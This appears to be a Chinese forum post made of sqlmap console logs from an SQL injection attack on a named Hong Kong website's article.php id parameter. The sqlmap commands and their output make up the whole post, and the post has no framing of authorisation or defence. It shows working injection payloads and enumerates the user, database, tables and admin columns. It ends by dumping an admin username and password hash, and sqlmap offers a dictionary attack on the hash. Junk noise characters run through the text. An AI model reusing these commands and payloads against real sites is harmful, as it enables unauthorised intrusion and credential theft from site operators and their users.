D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; K$ ~! o+ S' o# l2 B% P
ms "Mysql" --current-user /* 注解:获取当前用户名称% N2 B: J% Y( q6 K! x& m
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
; Z3 A2 v( u8 d3 Y[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' `+ H+ X& `) h( p
session file0 C/ H' P5 Q2 Y6 r. f9 V
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---9 O0 P( N/ d% y# b' B: l
Place: GET
" i/ V0 T7 j; S6 h+ a: B. wParameter: id
* A0 K; V1 J, [( P+ v' b$ Q Type: boolean-based blind4 H% S# R+ i/ ?
Title: AND boolean-based blind - WHERE or HAVING clause4 M, G3 `, j- G! {; ]7 _ U1 y
Payload: id=276 AND 799=799
9 b) E) o9 s8 Z' e' `1 @& A7 q" i Type: error-based6 @' W8 m5 H9 C
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 s- n8 k+ z/ J1 A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ o. R. d6 d4 O7 e0 b* A120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& R0 a& m7 m6 R
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 Q5 E" y: V0 G
Type: UNION query
1 }/ f2 c4 x0 Z' ? Title: MySQL UNION query (NULL) - 1 to 10 columns; l& a5 m/ t/ c; _
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- l: q8 ?" D9 z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 L7 H$ h+ I. R; M+ P8 r1 [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' o# s0 F4 P* Z# e8 m( q* `) A
Type: AND/OR time-based blind
4 ?( S5 C. y: d' v7 ] Title: MySQL > 5.0.11 AND time-based blind, J) L0 Z2 j3 X. D
Payload: id=276 AND SLEEP(5)+ e0 b' R0 D: Q |( c
---
+ Z5 [/ v, B8 E$ i4 r4 a4 b0 ^[16:53:55] [INFO] the back-end DBMS is MySQL
/ i: \+ }' W, ^7 O% G. k& V0 Y+ Rweb server operating system: Windows2 _$ Y* k- {/ P# E" N; b
web application technology: Apache 2.2.11, PHP 5.3.0: O( _" [: U" n) L
back-end DBMS: MySQL 5.01 m2 d2 W7 u/ P( o$ X
[16:53:55] [INFO] fetching current user2 J9 p0 z8 t4 O+ j# F6 M
current user: 'root@localhost' 7 a* _; P3 W- ~, g+ [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
! {$ z% M, g% {& t7 Z2 T5 Mtput\www.wepost.com.hk' shutting down at: 16:53:58
6 k4 y; E. H+ B- i8 a9 j5 z5 s* H& h) a2 r) k. q( X
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- ?/ ^# P$ d8 [7 k( U: Oms "Mysql" --current-db /*当前数据库, V% J/ a3 S" I$ [% j2 B m7 C
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) R+ A2 V X7 k, `2 e! O session file A$ ]8 y* c' w p- c7 H4 f6 o
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---3 K" y/ F$ n/ V, A+ _
Place: GET
' ~4 ]$ k' j" K9 zParameter: id5 B0 v5 [% I5 V8 f! A
Type: boolean-based blind( D# E, ~# _# b
Title: AND boolean-based blind - WHERE or HAVING clause8 m B$ E/ x; a. o* Z" g7 i
Payload: id=276 AND 799=799
* A7 M& k7 K$ J. M, ]* R3 [ Type: error-based+ S1 w1 r$ m" w
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- |8 Q' G+ w+ R% x9 F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 a0 J! h) W8 p
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ Z$ F2 f+ L, u. T! Y2 T
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 t8 Z6 k/ A1 r/ r Type: UNION query
4 \- D2 k3 ^0 m3 A0 v2 C% Z1 t- S Title: MySQL UNION query (NULL) - 1 to 10 columns
) @& O3 B2 b9 A) _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR$ p6 @) K l. J2 K. |6 z6 A
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; i/ F3 m2 B. ?, l6 p5 ?2 ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' l5 X: V* e# B5 Y% o
Type: AND/OR time-based blind3 L; J5 y2 i+ r
Title: MySQL > 5.0.11 AND time-based blind
6 Q, ^; G. g2 D( g' i$ i0 R6 h3 w Payload: id=276 AND SLEEP(5)8 o* k6 d$ V5 K- |! G
---
5 I1 S6 I) Y6 `5 Z* d* Q[16:54:17] [INFO] the back-end DBMS is MySQL
6 A# _0 [* B) ^/ _: s* |web server operating system: Windows- @1 s9 f8 q( c* ?. @
web application technology: Apache 2.2.11, PHP 5.3.0 c! P/ W# o' ]5 |7 D2 K
back-end DBMS: MySQL 5.0$ W' M) }5 x8 Q
[16:54:17] [INFO] fetching current database
/ u w5 d3 |- E% ]; w, Y. [current database: 'wepost'
7 ^( D1 G/ B% e7 A, q5 \9 E" e[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* x7 E5 U% I/ C+ s3 Y o- Q7 D! f v! s* Dtput\www.wepost.com.hk' shutting down at: 16:54:18+ {2 A: Y3 h! Z6 K3 m2 |" L
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 g Q+ | ?2 Q3 f0 \ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名7 y' p7 t* _# Q: p/ B2 ?
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
% K5 t X1 p3 u3 Q% T[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 o, C; e1 f* A3 q( f
session file1 n6 w: T" M6 x, p
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
( [' h, {) H' O$ w0 d* U! {) Q---
9 R, J! Q7 y8 \8 w% nPlace: GET, \) v2 M% y, W( x y0 K5 Q' |
Parameter: id
2 H2 \6 O" h! u Type: boolean-based blind
( n5 [& s$ I1 H F8 D Title: AND boolean-based blind - WHERE or HAVING clause( w2 T" u5 O; A8 v9 s
Payload: id=276 AND 799=799
2 I) U$ X/ Y+ t, S* B9 t Type: error-based
/ s8 H( b8 h. C8 s# g. k' k1 I# } Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ H6 Z7 s8 u4 _' z$ C' z3 ~7 n @0 r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 o4 Q; W) T0 L& u( f% M& a
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 S; I) k: y* A) A- n a5 x+ `
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 w6 }% u1 E' M1 T' V) G! _" X Type: UNION query
5 o# @; O( j7 a4 Z Title: MySQL UNION query (NULL) - 1 to 10 columns- L; }& _" ~6 L$ x' j4 K/ Q: K
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 d( H7 V: `, F1 O; j0 [3 i9 `1 C7 N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! H5 b* i9 T% P5 }$ i
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- g4 F i0 q7 z* r Type: AND/OR time-based blind
\( J4 G' w' S4 ^7 _1 q" A/ v2 ?( P- _ Title: MySQL > 5.0.11 AND time-based blind
- q6 a& ]( r( j8 i- m3 R Payload: id=276 AND SLEEP(5)
' R4 W/ z5 e/ U/ @3 c3 v---
& L2 V# n* `- n) F+ r/ Q% K/ @[16:55:26] [INFO] the back-end DBMS is MySQL
* k" L& D, _, `; A) a/ n& W- Dweb server operating system: Windows
+ }( O% U, a% P; b- L3 H3 N4 A! ~web application technology: Apache 2.2.11, PHP 5.3.0
1 I- X8 P* r+ m L3 M$ \6 I/ ]) Oback-end DBMS: MySQL 5.0* E+ p5 [% |" m- E3 ~
[16:55:26] [INFO] fetching tables for database 'wepost': z. |0 C. F" D$ }6 ?7 Q
[16:55:27] [INFO] the SQL query used returns 6 entries$ V- _. }! W) o9 d. i4 C
Database: wepost% _: ?( X; P3 |+ \
[6 tables]9 u6 z( `# U# n+ d; H
+-------------+
: E( _. Q8 z; R* j" |9 B3 m| admin |
6 m& a( S2 J- `1 S| article |! a4 \1 K4 Y/ M# `$ m* P+ Z
| contributor |
! V# s- r" g9 l% Q1 Z2 U| idea |1 R/ P2 a7 E% n; C; d* ^2 M" [
| image |
$ H& Z( g# j6 @/ Y9 Q* y; m+ y| issue |% }0 l: _6 V# s
+-------------+
. l& r. o0 F" [. [, }) n a/ z2 [: S[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ n* g" [7 N6 h* N# r$ Ntput\www.wepost.com.hk' shutting down at: 16:55:33
# _% K5 F1 _; {( ` l8 }1 C) z
E# `/ `; l) b$ a# Y3 hD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
V0 S" h _2 h8 \ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名6 `+ M' c0 F) f2 P* u6 r
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
W6 @0 o& U/ w8 U) y- G---' G, g# H1 _# k# A2 a: R& F
Place: GET
1 M2 N9 [; @" \" V/ z+ j) ^- O6 PParameter: id3 h, P d2 t% P, O$ ]
Type: boolean-based blind
9 M& w$ L; l V3 @3 j8 e+ k Title: AND boolean-based blind - WHERE or HAVING clause
; r2 }$ p1 q; _ Payload: id=276 AND 799=799
) a' c- ?2 d# [$ \. }; B Type: error-based- R* Z5 C+ j+ o' X
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 {7 z6 L" r$ y- ?; m& @( U5 ?0 ^/ Z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( ]: u; z* z; K( y( H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 ^; l5 S, N, Q$ x; W) v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) ^0 | t" c& H* }5 f5 G" t
Type: UNION query
( w+ g9 W$ J' a& \ i: Y Title: MySQL UNION query (NULL) - 1 to 10 columns: d- A4 s. t+ ]9 x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' _: i/ J8 `9 E. k
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 _, J6 k3 S( {- U" p+ ICHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## d$ ]& z; ?' Z9 f6 X. n" o8 o8 h- x
Type: AND/OR time-based blind( B5 }! s$ E- h4 U9 E T( D
Title: MySQL > 5.0.11 AND time-based blind3 C- }, B) N k% `7 y% X3 l B
Payload: id=276 AND SLEEP(5)6 d' e; a: N$ ^! c" j& I( s
---
7 ~$ d U: A5 L7 C1 u% T! ]4 Vweb server operating system: Windows
7 _2 }; H8 s, `( t8 x) o& {web application technology: Apache 2.2.11, PHP 5.3.0
+ [; M }5 Y* y9 ^back-end DBMS: MySQL 5.0
3 Z5 K; v; |( v3 [: m[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se1 y% H) a1 B! H1 G' ]5 ~
ssion': wepost, wepost
! V- ]7 w) x0 l/ t! g/ dDatabase: wepost9 m3 [! D/ q2 H! B5 P
Table: admin( J6 w& j3 A* q, n& ~
[4 columns]
' r( u; f! r4 [$ Y+----------+-------------+
- c1 t- o0 I- z! {| Column | Type |
2 ~3 e, R, I" X. @; T$ C/ s+----------+-------------+
4 w# [8 H' m' G. z. [9 U+ d| id | int(11) |! v7 {9 R+ P# n: |' b, |
| password | varchar(32) |
5 q$ R/ [. T7 J N! H| type | varchar(10) |
3 [ V4 D7 t) C| userid | varchar(20) |
' L- A1 M& m3 h5 O4 v6 U+----------+-------------+& \( ?6 W% c7 t# ] ^9 e9 E; b
shutting down at: 16:56:19
) z f; l7 V7 ^' A) O7 h! C7 _% ED:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* |1 {8 r: U7 xms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
" U( Q+ i) v! E6 D5 {; lPlace: GET
6 k9 E) A# @3 P& s' Q# vParameter: id
8 m) j& v" q; z& m6 ^5 f Type: boolean-based blind" W* j) {9 G9 j; d; s( F7 G
Title: AND boolean-based blind - WHERE or HAVING clause$ l' N# G7 x# h
Payload: id=276 AND 799=799
' V0 m( M& { S+ h p5 X; } Type: error-based
$ H/ {! D/ P% j' T- y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ i( S/ q; y% f+ t; n1 n+ N1 I
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, k0 X2 y5 y& v9 S7 n9 r- l
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" W- v* T- Y, y) V$ C: I! n% \2 U5 d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% g: }! ~- { p: v# @8 U$ C } Type: UNION query0 |6 P" k. l% s8 Q
Title: MySQL UNION query (NULL) - 1 to 10 columns
4 ^1 Q3 g7 P) ?, J8 m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) A ^. @ a8 ?5 c* V
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
$ m) r2 n& f7 H ]CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J, u* T3 i! S. W1 B) I
Type: AND/OR time-based blind) B! d0 C1 M; j. c* }/ N" s" l
Title: MySQL > 5.0.11 AND time-based blind. E2 s! z+ v/ R7 ~' {* }
Payload: id=276 AND SLEEP(5)2 _2 ]" x2 ]6 e) R' E
---7 y1 v/ c# d z
web server operating system: Windows- `5 a: b' \, \5 B
web application technology: Apache 2.2.11, PHP 5.3.0
0 [* a9 [+ M' k" I4 X5 r( sback-end DBMS: MySQL 5.0
4 V) W2 W L- E, zrecognized possible password hash values. do you want to use dictionary attack o: |- Z; U* R9 ]
n retrieved table items? [Y/n/q] y+ F* g0 h3 H+ \6 S
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
" {' Q& Y( n# o0 g: I& D' `, sdo you want to use common password suffixes? (slow!) [y/N] y
- A- p' z" W! @5 a- RDatabase: wepost
' D" d, v* l. [% g+ `4 z/ oTable: admin
' G' _; b3 X* I! w" Q$ S. Y% o) p[1 entry]/ E# M* f+ ~ }/ }. r9 n' ~) y# e
+----------------------------------+------------++ M: C5 S& s# F* A
| password | userid |
r- F4 G4 E$ @+----------------------------------+------------+% z; g# O2 j, a
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |; r& `9 }1 {% n6 c
+----------------------------------+------------+
shutting down at: 16:58:14
! [% p9 t9 }. w3 X! j( K$ N6 I. m- F$ L9 U( I9 @$ Q2 i8 S; k( [ g
D:\Python27\sqlmap> |